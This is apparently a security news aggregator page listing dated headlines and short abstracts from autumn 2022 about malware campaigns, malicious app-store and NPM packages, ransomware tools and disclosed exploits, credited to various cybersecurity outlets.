New Azov data wiper tries to frame researchers and BleepingComputer
Abstract
A new and destructive 'Azov Ransomware' data wiper is being heavily distributed through pirated software, key generators, and adware bundles, trying to frame well-known security researchers by claiming they are behind the attack. (Source: BleepingComputer)
October 29, 2022
Defeating Guloader Anti-Analysis Technique
Abstract
The Guloader malware uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis. (Source: Palo Alto Networks)
October 28, 2022
These Dropper Apps on Play Store Are Targeting Over 200 Banking and Cryptocurrency Wallets
Abstract
Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur, which are capable of stealing financial data and performing on-device fraud. "These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric told The Hacker News in a statement. "This evolution includes following newly introduced policies and masquerading as file managers and overcoming limitations by side-loading the malicious payload through the web browser." Targets of these droppers include 231 banking and cryptocurrency wallet apps from financial institutions in Italy, the U.K., Germany, Spain, Poland, Austria, the U.S., Australia, France, and the Netherlands. Dropper apps on official app stores like Google Play have increasingly become a popular and efficient technique to distribute banking m [...] (Source: The Hacker News)
October 28, 2022
Android malware droppers with 130K installs found on Google Play
Abstract
A set of Android malware droppers were found infiltrating the Google Play store to install malicious programs by pretending to be app updates. (Source: BleepingComputer)
October 27, 2022
Researchers Expose Over 80 ShadowPad Malware C2 Servers
Abstract
As many as 85 command-and-control (C2) servers have been discovered supported by the ShadowPad malware since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad, seen as a successor to PlugX, is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015. Taiwanese cybersecurity firm TeamT5, earlier this May, disclosed details of another China-nexus modular implant named Pangolin8RAT, which is believed to be the successor of the PlugX and ShadowPad malware families, linking it to a threat group dubbed Tianwu. An analysis of the three ShadowPad artifacts, which have been previously put to use by Winnti, Tonto Team, and an emerging threat cluster codenamed Space Pirates, made it possible to discover the C2 servers by scanning th [...] (Source: The Hacker News)
October 27, 2022
Drinik Android malware now targets users of 18 Indian banks
Abstract
A new version of the Drinik Android banking trojan targets 18 Indian banks, masquerading as the country's official tax management app to steal victims' personal information and banking credentials. (Source: BleepingComputer)
October 25, 2022
BlackByte Adds Exbyte Exfiltration Tool to Strengthen Extortion Game
Abstract
BlackByte ransomware operators have started deploying a new exfiltration tool, named Exbyte, to speed up data theft and upload it to an external server. Exbyte is a Go-based exfiltration tool that uploads stolen files directly to the Mega cloud storage service. With new custom tools, distribut ... (Source: Cyware Alerts - Hacker News)
October 25, 2022
Two PoS Malware used to steal data from more than 167,000 credit cards
Abstract
Researchers reported that threat actors used 2 PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware to steal data associated with more than 167,000 credit cards from... (Source: Security Affairs)
October 25, 2022
Ukrainian charged for operating Raccoon Stealer malware service
Abstract
26-year-old Ukrainian national Mark Sokolovsky has been charged for his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation. (Source: BleepingComputer)
October 25, 2022
Dormant Colors campaign operates over 1M malicious Chrome extensions
Abstract
A new malvertising campaign, code-named Dormant Colors, is delivering malicious Google Chrome extensions that hijack targets’ browsers. Researchers at Guardio Labs have discovered a new malvertising campaign, called Dormant Colors, aimed at delivering... (Source: Security Affairs)
October 24, 2022
Chrome extensions with 1 million installs hijack targets’ browsers
Abstract
Researchers at Guardio Labs have discovered a new malvertising campaign pushing Google Chrome and Microsoft Edge extensions that hijack searches and insert affiliate links into webpages. (Source: BleepingComputer)
October 24, 2022
Security experts targeted with malicious CVE PoC exploits on GitHub
Abstract
A team of researchers at the Leiden Institute of Advanced Computer Science discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities. (Source: Security Affairs)
October 24, 2022
Malicious Clicker apps in Google Play have 20M+ installs
Abstract
Researchers discovered 16 malicious clicker apps in the official Google Play store that were downloaded by 20M+ users. Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed... (Source: Security Affairs)
October 24, 2022
Security experts targeted with malicious CVE PoC exploits on GitHub
Abstract
Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin... (Source: Security Affairs)
October 22, 2022
Android adware apps in Google Play downloaded over 20 million times
Abstract
Security researchers at McAfee have discovered a set of 16 malicious clicker apps that managed to sneak into Google Play, the official app store for Android. (Source: BleepingComputer)
October 22, 2022
New Clicker Android Malware Infects 20 Million Users
Abstract
Google Play Store kicked out 16 malicious apps, with a cumulative download of 20 million, that were propagating the Clicker malware for mobile ad fraud. Researchers highlight that the new Android malware is designed to disrupt the mobile advertising ecosystem. It enables its operators to generate r ... (Source: Cyware Alerts - Hacker News)
October 21, 2022
ERMAC Banking Trojan Targets Hundreds of Android Users
Abstract
Cyble detected a mass phishing campaign targeting Android users with the ERMAC banking trojan, with the latest version of the trojan targeting 467 apps. The threat actor used typosquatted domains of popular Android application hosting platforms such as Google PlayStore, APKPure, and APKCombo. (Source: Cyware Alerts - Hacker News)
October 21, 2022
New URSNIF variant doesn’t support banking features
Abstract
A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif's original purpose, as the malware was initially used in banking frauds... (Source: Security Affairs)
October 20, 2022
Ursnif malware switches from bank account theft to initial access
Abstract
A new version of the Ursnif malware (a.k.a. Gozi) emerged as a generic backdoor, stripped of its typical banking trojan functionality. (Source: BleepingComputer)
October 20, 2022
Experts spotted a new undetectable PowerShell Backdoor posing as a Windows update
Abstract
Cybersecurity researchers warn of a new PowerShell backdoor that disguises itself as part of the Windows update process to avoid detection. Cybersecurity researchers from SafeBreach issued a warning of a new PowerShell backdoor masqueraded as a Windows update... (Source: Security Affairs)
October 20, 2022
Hackers Using New Version of FurBall Android Malware to Spy on Iranian Citizens
Abstract
The Iranian threat actor known as Domestic Kitten has been attributed to a new mobile campaign that masquerades as a translation app to distribute an updated variant of an Android malware known as FurBall. "Since June 2021, it has been distributed as a translation app via a copycat of an Iranian website that provides translated articles, journals, and books," ESET researcher Lukas Stefanko said in a report shared with The Hacker News. The updates, while retaining the same surveillance functionality as earlier versions, are designed to evade detection by security solutions, the Slovak cybersecurity firm added. Domestic Kitten, also called APT-C-50, is an Iranian threat activity cluster that has been previously identified as targeting individuals of interest with the goal of harvesting sensitive information from compromised mobile devices. It's been known to be active since at least 2016. A tactical analysis conducted by Trend Micro in 2019 revealed Domestic Kitten [...] (Source: The Hacker News)
October 20, 2022
These 16 Clicker Malware Infected Android Apps Were Downloaded Over 20 Million Times
Abstract
As many as 16 malicious apps with over 20 million cumulative downloads have been taken down from the Google Play Store after they were caught committing mobile ad fraud. The Clicker malware masqueraded as seemingly harmless utilities like cameras, currency/unit converters, QR code readers, note-taking apps, and dictionaries, among others, in a bid to trick users into downloading them, cybersecurity firm McAfee said. The list of offending apps is as follows: High-Speed Camera (com.hantor.CozyCamera), 10,000,000+ downloads; Smart Task Manager (com.james.SmartTaskManager), 5,000,000+ downloads; Flashlight+ (kr.caramel.flash_plus), 1,000,000+ downloads; 달력메모장 (com.smh.memocalendar), 1,000,000+ downloads; K-Dictionary (com.joysoft.wordBook), 1,000,000+ downloads; BusanBus (com.kmshack.BusanBus), 1,000,000+ downloads; Flashlight+ (com.candlencom.candleprotest), 500,000+ downloads; Quick Note (com.movinapp.quicknote), 500,000+ downloads; Currency Converter (com.smartwho.Sma [...] (Source: The Hacker News)
October 20, 2022
New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft
Abstract
The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot. "This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis. The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations. Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the "divergent evolution of Gozi" over th [...] (Source: The Hacker News)
October 18, 2022
PHP Malware Distributed as Cracked Microsoft Office Apps, Telegram
Abstract
The Zscaler ThreatLabz research team observed a PHP version of ‘Ducktail’ Infostealer distributed in the form of cracked application installers for a variety of applications including games, Microsoft Office applications, Telegram, and others. (Source: GB Hackers)
October 18, 2022
Chinese ‘Spyder Loader’ Malware Spotted Targeting Organizations in Hong Kong
Abstract
The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees. Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies. The threat actor's campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims' networks. Earlier this May, Cybereason disclosed long-running attacks orchestrated by the group since 2019 to siphon technology secrets from technology and manufacturing companies mainly located in East Asia, Western Europe, and North America. The intrusions, clubb [...] (Source: The Hacker News)
October 17, 2022
Malware dev claims to sell new BlackLotus Windows UEFI bootkit
Abstract
A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups. (Source: BleepingComputer)
October 17, 2022
New UEFI rootkit Black Lotus offered for sale at $5,000
Abstract
Black Lotus is a new, powerful Windows UEFI rootkit advertised on underground criminal forums, a researcher warns. Cybersecurity researcher Scott Scheferman reported that a new Windows UEFI rootkit, dubbed Black Lotus, is advertised on underground criminal... (Source: Security Affairs)
October 17, 2022
Copybara Malware Uses Vishing Tricks to Target Italian Banking Users
Abstract
Researchers at ThreatFabric uncovered an Android banking malware attack phishing users for their contact details and sensitive banking data. The malware, dubbed Copybara, can extract usernames and passwords for multiple banking accounts. The attack begins with an SMS phishing message purported to a ... (Source: Cyware Alerts - Hacker News)
October 17, 2022
New ‘Black Lotus’ UEFI Rootkit Provides APT-Level Capabilities to Cybercriminals
Abstract
Black Lotus provides a full set of capabilities to attackers, including file transfer and tasking support, and can potentially become a major threat across IT and OT environments. (Source: Security Week)
October 16, 2022
New PHP information-stealing malware targets Facebook accounts
Abstract
Threat analysts have spotted a new Ducktail campaign using a new infostealer variant and novel TTPs (tactics, techniques, and procedures), while the Facebook users it targets are no longer limited to holders of business accounts. (Source: BleepingComputer)
October 15, 2022
New PHP Version of Ducktail info-stealer hijacks Facebook Business accounts
Abstract
Experts spotted a PHP version of an information-stealing malware called Ducktail spread as cracked installers for legitimate apps and games. Zscaler researchers discovered a PHP version of an information-stealing malware tracked as Ducktail. The malicious... (Source: Security Affairs)
October 14, 2022
New Alchimist C2 Framework Targets Windows, Linux, macOS
Abstract
A new attack and C2 framework, dubbed Alchimist, was found capable of targeting Linux, macOS, and Windows systems. It can run arbitrary commands and perform remote shellcode execution. These kinds of frameworks have high quality, rich features, good detection evasion capabilities, and effective imp ... (Source: Cyware Alerts - Hacker News)
October 14, 2022
YoWhatsApp - An Unofficial WhatsApp App Steals Credentials
Abstract
A malicious version of the popular WhatsApp messaging app was found dropping an Android trojan known as Triada. Named YoWhatsApp, the unofficial app offers the ability to lock chats, send texts to unsaved numbers, and customize using different themes. It is spread to users via fraudulent ads on Sna ... (Source: Cyware Alerts - Hacker News)
October 14, 2022
New PHP Version of Ducktail Malware Hijacking Facebook Business Accounts
Abstract
A PHP version of an information-stealing malware called Ducktail has been discovered in the wild being distributed in the form of cracked installers for legitimate apps and games, according to the latest findings from Zscaler. "Like older versions (.NetCore), the latest version (PHP) also aims to exfiltrate sensitive information related to saved browser credentials, Facebook account information, etc.," Zscaler ThreatLabz researchers Tarun Dewan and Stuti Chaturvedi said. Ducktail, which emerged on the threat landscape in late 2021, is attributed to an unnamed Vietnamese threat actor, with the malware primarily designed to hijack Facebook business and advertising accounts. The financially motivated cybercriminal operation was first documented by Finnish cybersecurity company WithSecure (formerly F-Secure) in late July 2022. While previous versions of the malware were found to use Telegram as a command-and-control (C2) channel to exfiltrate information, the PHP var [...] (Source: The Hacker News)
October 14, 2022
PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks
Abstract
A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. "FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said. "Additionally, a user can SSH into the system which exposes a locked down CLI interface." The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access "to do just about anything" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic. That said, [...] (Source: The Hacker News)
October 13, 2022
Exploit available for critical Fortinet auth bypass bug, patch now
Abstract
Proof-of-concept exploit code is now available for a critical authentication bypass vulnerability affecting Fortinet's FortiOS, FortiProxy, and FortiSwitchManager appliances. (Source: BleepingComputer)
October 13, 2022
New Chinese Malware Attack Framework Targets Windows, macOS, and Linux Systems
Abstract
A previously undocumented command-and-control (C2) framework dubbed Alchimist is likely being used in the wild to target Windows, macOS, and Linux systems. "Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy payload to the remote machines, capture screenshots, perform remote shellcode execution, and run arbitrary commands," Cisco Talos said in a report shared with The Hacker News. Written in GoLang, Alchimist is complemented by a beacon implant called Insekt, which comes with remote access features that can be instrumented by the C2 server. The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka, which has been touted as the "Chinese sibling of Sliver and Cobalt Strike." Even more interestingly, both Manjusaka and Alchimist pack in similar functionalities, desp [...] (Source: The Hacker News)
October 13, 2022
The discovery of Alchimist C2 tool, revealed a new attack framework to target Windows, macOS, and Linux systems Full Text
Abstract
Experts discovered a new attack framework, including a C2 tool dubbed Alchimist, used in attacks against Windows, macOS, and Linux systems. Researchers from Cisco Talos discovered a new, previously undocumented attack framework that included a C2 dubbed...Security Affairs
October 13, 2022
YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan Full Text
Abstract
Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named 'YoWhatsApp' that steals access keys...Security Affairs
October 13, 2022
Modified WhatsApp App Caught Infecting Android Devices with Malware Full Text
Abstract
An unofficial version of the popular WhatsApp messaging app called YoWhatsApp has been observed deploying an Android trojan known as Triada. The goal of the malware is to steal the keys that "allow the use of a WhatsApp account without the app," Kaspersky said in a new report. "If the keys are stolen, a user of a malicious WhatsApp mod can lose control over their account." YoWhatsApp offers the ability for users to lock chats, send messages to unsaved numbers, and customize the app with a variety of theming options. It's also said to share overlaps with other modded WhatsApp clients such as FMWhatsApp and HeyMods. The Russian cybersecurity company said it found the malicious functionality in YoWhatsApp version 2.22.11.75. Typically spread through fraudulent ads on Snaptube and Vidmate, the app, upon installation, requests the victims to grant it permissions to access SMS messages, enabling the malware to enroll them to paid subscriptions without theirThe Hacker News
October 12, 2022
Unofficial WhatsApp Android app caught stealing users’ accounts Full Text
Abstract
A new version of an unofficial WhatsApp Android application named 'YoWhatsApp' has been found stealing access keys for users' accounts.BleepingComputer
October 11, 2022
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting their tactics, techniques, and procedures to avoid detection.Security Affairs
October 11, 2022
Hacking group POLONIUM uses ‘Creepy’ malware against Israel Full Text
Abstract
Security researchers reveal previously unknown malware used by the cyber espionage hacking group 'POLONIUM,' threat actors who appear to target Israeli organizations exclusively.BleepingComputer
October 10, 2022
Researchers Detail Malicious Tools Used by Cyberespionage Group Earth Aughisky Full Text
Abstract
A new piece of research has detailed the increasingly sophisticated nature of the malware toolset employed by an advanced persistent threat (APT) group named Earth Aughisky. "Over the last decade, the group has continued to make adjustments in the tools and malware deployments on specific targets located in Taiwan and, more recently, Japan," Trend Micro disclosed in a technical profile last week. Earth Aughisky, also known as Taidoor, is a cyber espionage group that's known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends. While the Chinese threat actor has been known to primarily target organizations in Taiwan, victimology patterns observed towards late 2017 indicate an expansion to Japan. The most commonly targeted industry verticals include government, telcom, manufacturing, heavy, technology, transportation, and healthcare. Attack chains mounted by the groupThe Hacker News
October 10, 2022
Maggie Backdoor Eats Up Hundreds of SQL Servers Around the Globe Full Text
Abstract
A new malware strain named Maggie is targeting Microsoft SQL servers and has already backdoored hundreds of machines globally. The malware boasts simple TCP redirection functionality that can allow a remote hacker to connect to any IP address the infected MS-SQL server can reach. The malware’s capa ... Read MoreCyware Alerts - Hacker News
October 10, 2022
RatMilad Spyware Attempts To Penetrate Middle Eastern Enterprises Full Text
Abstract
Mobile security firm Zimperium uncovered a new Android spyware, dubbed RatMilad, sneaking into users’ mobile devices for the Middle Eastern enterprises. Researchers have warned that the malware could be used by cybercriminals for numerous purposes ranging from cyberespionage to eavesdropping on vic ... Read MoreCyware Alerts - Hacker News
October 09, 2022
Solana Phantom security update NFTs push password-stealing malware Full Text
Abstract
Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets.BleepingComputer
October 07, 2022
Facebook Detects 400 Android and iOS Apps Stealing Users Log-in Credentials Full Text
Abstract
Meta Platforms on Friday disclosed that it had identified over 400 malicious apps on Android and iOS that it said targeted online users with the goal of stealing their Facebook login information. "These apps were listed on the Google Play Store and Apple's App Store and disguised as photo editors, games, VPN services, business apps, and other utilities to trick people into downloading them," the social media behemoth said in a report shared with The Hacker News. 42.6% of the rogue apps were photo editors, followed by business utilities (15.4%), phone utilities (14.1%), games (11.7%), VPNs (11.7%), and lifestyle apps (4.4%). Interestingly, a majority of the iOS apps posed as ads manager tools for Meta and its Facebook subsidiary. Besides concealing its malicious nature as a set of seemingly harmless apps, the operators of the scheme also published fake reviews that were designed to offset the negative reviews left by users who may have previously downloaded the appsThe Hacker News
October 07, 2022
LofyGang Distributed ~200 Malicious NPM Packages to Steal Credit Card Data Full Text
Abstract
Multiple campaigns that distributed trojanized and typosquatted packages on the NPM open source repository have been identified as the work of a single threat actor dubbed LofyGang. Checkmarx said it discovered 199 rogue packages totaling thousands of installations, with the group operating for over a year with the goal of stealing credit card data as well as user accounts associated with Discord Nitro, gaming, and streaming services. "LofyGang operators are seen promoting their hacking tools in hacking forums, while some of the tools are shipped with a hidden backdoor," the software security company said in a report shared with The Hacker News prior to its publication. Various pieces of the attack puzzle have already been reported by JFrog, Sonatype, and Kaspersky (which called it LofyLife), but the latest analysis pulls the various operations together under one organizational umbrella that Checkmarx is referring to as LofyGang. Believed to be an organized crThe Hacker News
October 7, 2022
LilithBot Malware, a new MaaS offered by the Eternity Group Full Text
Abstract
Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka...Security Affairs
October 6, 2022
Detecting fileless malware infections is becoming easier Full Text
Abstract
Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems.Help Net Security
October 5, 2022
New Maggie malware already infected over 250 Microsoft SQL servers Full Text
Abstract
Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie,...Security Affairs
October 5, 2022
OnionPoison: malicious Tor Browser installer served through a popular Chinese YouTube channel Full Text
Abstract
OnionPoison: researchers reported that an infected Tor Browser installer has been distributed through a popular YouTube channel. Kaspersky researchers discovered that a trojanized version of a Windows installer for the Tor Browser has been distributed...Security Affairs
October 05, 2022
New Android malware ‘RatMilad’ can steal your data, record audio Full Text
Abstract
A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data.BleepingComputer
October 4, 2022
Malicious Tor Browser spreads through YouTube Full Text
Abstract
One of the libraries bundled with the malicious Tor Browser is infected with spyware that collects various personal data and sends it to a command and control server. It also gives attackers the ability to execute shell commands.Securelist
October 04, 2022
ProxyNotShell – the New Proxy Hell? Full Text
Abstract
Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082, that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers. Based on ProxyShell, this new zero-day abuse risk leverages a chained attack similar to the one used in the 2021 ProxyShell attack, which exploited the combination of multiple vulnerabilities (CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207) to permit a remote actor to execute arbitrary code. Despite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities. Meet ProxyNotShell. Recorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enableThe Hacker News
October 3, 2022
Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor Full Text
Abstract
A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100...Security Affairs
October 03, 2022
Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub Full Text
Abstract
Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities.BleepingComputer
September 30, 2022
New Malware Families Found Targeting VMware ESXi Hypervisors Full Text
Abstract
Threat actors have been found deploying never-before-seen post-compromise implants in VMware's virtualization software to seize control of infected systems and evade detection. Google's Mandiant threat intelligence division referred to it as a "novel malware ecosystem" that impacts VMware ESXi, Linux vCenter servers, and Windows virtual machines, allowing attackers to maintain persistent access to the hypervisor as well as execute arbitrary commands. The hyperjacking attacks, per the cybersecurity vendor, involved the use of malicious vSphere Installation Bundles (VIBs) to sneak in two implants, dubbed VIRTUALPITA and VIRTUALPIE, on the ESXi hypervisors. "It is important to highlight that this is not an external remote code execution vulnerability; the attacker needs admin-level privileges to the ESXi hypervisor before they can deploy malware," Mandiant researchers Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore said in an exhausThe Hacker News
September 30, 2022
Experts uncovered novel Malware persistence within VMware ESXi Hypervisors Full Text
Abstract
Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors. Mandiant detailed a novel technique used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over...Security Affairs
September 29, 2022
A cracked copy of Brute Ratel post-exploitation tool leaked on hacking forums Full Text
Abstract
The Brute Ratel post-exploitation toolkit has been cracked and now is available in the underground hacking and cybercrime communities. Threat actors have cracked the Brute Ratel C4 (BRC4) post-exploitation toolkit and leaked it for free in the cybercrime...Security Affairs
September 29, 2022
Go-based Chaos malware is rapidly growing targeting Windows, Linux and more Full Text
Abstract
A new multifunctional Go-based malware dubbed Chaos is targeting both Windows and Linux systems, experts warn. Researchers from Black Lotus Labs at Lumen Technologies, recently uncovered a multifunctional Go-based malware that was developed to target...Security Affairs
September 29, 2022
New malware backdoors VMware ESXi servers to hijack virtual machines Full Text
Abstract
Hackers have found a new method to establish persistence on VMware ESXi hypervisors to control vCenter servers and virtual machines for Windows and Linux while avoiding detection.BleepingComputer
September 29, 2022
Upgraded Prilex Point-of-Sale malware bypasses credit card security Full Text
Abstract
Security analysts have observed three new versions of Prilex this year, indicating that the authors and operators of the PoS-targeting malware are back to action.BleepingComputer
September 28, 2022
Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems Full Text
Abstract
A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet. "Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute-forcing SSH private keys, as well as launch DDoS attacks," researchers from Lumen's Black Lotus Labs said in a write-up shared with The Hacker News. A majority of the bots are located in Europe, specifically Italy, with other infections reported in China and the U.S., collectively representing "hundreds of unique IP addresses" over a one-month time period from mid-June through mid-July 2022. Written in Chinese and leveraging China-based infrastructure for command-and-control, the botnet joins a long list of malware that are designed to establish persiThe Hacker News
September 28, 2022
Threat actors use Quantum Builder to deliver Agent Tesla malware Full Text
Abstract
The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT. A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT),...Security Affairs
September 28, 2022
New Chaos malware infects Windows, Linux devices for DDoS attacks Full Text
Abstract
A quickly expanding botnet called Chaos is targeting and infecting Windows and Linux devices to use them for cryptomining and launching DDoS attacks.BleepingComputer
September 27, 2022
New NullMixer dropper infects your PC with a dozen malware families Full Text
Abstract
A new malware dropper named 'NullMixer' is infecting Windows devices with a dozen different malware families simultaneously through fake software cracks promoted on malicious sites in Google Search results.BleepingComputer
September 27, 2022
More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID Full Text
Abstract
This particular attack chain was discovered in early August 2022 and delivered IcedID, also known as Bokbot, as the final payload. This information stealer, IcedID, is well-known malware that has been attacking users since 2019.Palo Alto Networks
September 27, 2022
New NullMixer Malware Campaign Stealing Users’ Payment Data and Credentials Full Text
Abstract
Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems. "When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware, and many others." Besides siphoning users' credentials, address, credit card data, cryptocurrencies, and even Facebook and Amazon account session cookies, what makes NullMixer insidious is its ability to download dozens of trojans at once, significantly widening the scale of the infections. Attack chains typically start when a user attempts to download cracked software from one of the sites, which leads to a password-protected archive that contains an executable filThe Hacker News
September 27, 2022
Agent Tesla RAT Delivered by Quantum Builder With New TTPs Full Text
Abstract
Zscaler ThreatLabz has observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT) active since 2014, using a builder named “Quantum Builder” sold on the dark web.Zscaler
September 27, 2022
Experts Uncover 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme Full Text
Abstract
As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019. The latest iteration, dubbed Scylla by online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codenames Poseidon and Charybdis, respectively. Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times. The original Poseidon operation comprised over 40 Android apps that were designed to display ads out of context or hidden from the view of the device user. Charybdis, on the other hand, was an improvement over the former by making use of code obfuscation tactics to target advertising platforms. Scylla presents the latest adaptation of the scheme in that it expands beyond Android to make a foray into the iOS ecosystem for the first time, alongside relying on additional layers of code roundabout using the AllThe Hacker News
September 27, 2022
Erbium info-stealing malware, a new option in the threat landscape Full Text
Abstract
The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games. Threat actors behind the new 'Erbium' information-stealing malware are distributing it as fake cracks and cheats for popular...Security Affairs
September 26, 2022
New Erbium password-stealing malware spreads as game cracks, cheats Full Text
Abstract
The new 'Erbium' information-stealing malware is being distributed as fake cracks and cheats for popular video games to steal victims' credentials and cryptocurrency wallets.BleepingComputer
September 26, 2022
NullMixer drops Redline Stealer, SmokeLoader and other malware Full Text
Abstract
The infection vector of NullMixer is based on a ‘User Execution’ malicious link that requires the end user to click on and download a password-protected ZIP/RAR archive with a malicious file that is extracted and executed manually.Securelist
September 26, 2022
Hackers use PowerPoint files for ‘mouseover’ malware delivery Full Text
Abstract
Hackers believed to work for Russia have started using a new code execution technique that relies on mouse movement in Microsoft PowerPoint presentations to trigger a malicious PowerShell script.BleepingComputer
September 26, 2022
Adware on Google Play and Apple Store installed 13 million times Full Text
Abstract
Security researchers have discovered 75 applications on Google Play and another ten on Apple's App Store engaged in ad fraud. Collectively, they add to 13 million installations.BleepingComputer
September 26, 2022
Exmatter exfiltration tool used to implement new extortion tactics Full Text
Abstract
Ransomware operators switch to new extortion tactics by using the Exmatter malware and adding new data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques, this is the case...Security Affairs
September 24, 2022
Malicious NPM package discovered in supply chain attack Full Text
Abstract
Researchers with ReversingLabs said the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories.Tech Target
September 23, 2022
The Harly Trojan subscriber in Google Play apps Full Text
Abstract
Since 2020 more than 190 apps infected with Harly have been found on Google Play. A conservative estimate of the number of downloads of these apps is 4.8 million, but the actual figure may be even higher.Kaspersky Lab
September 22, 2022
Malicious NPM Package Caught Mimicking Material Tailwind CSS Package Full Text
Abstract
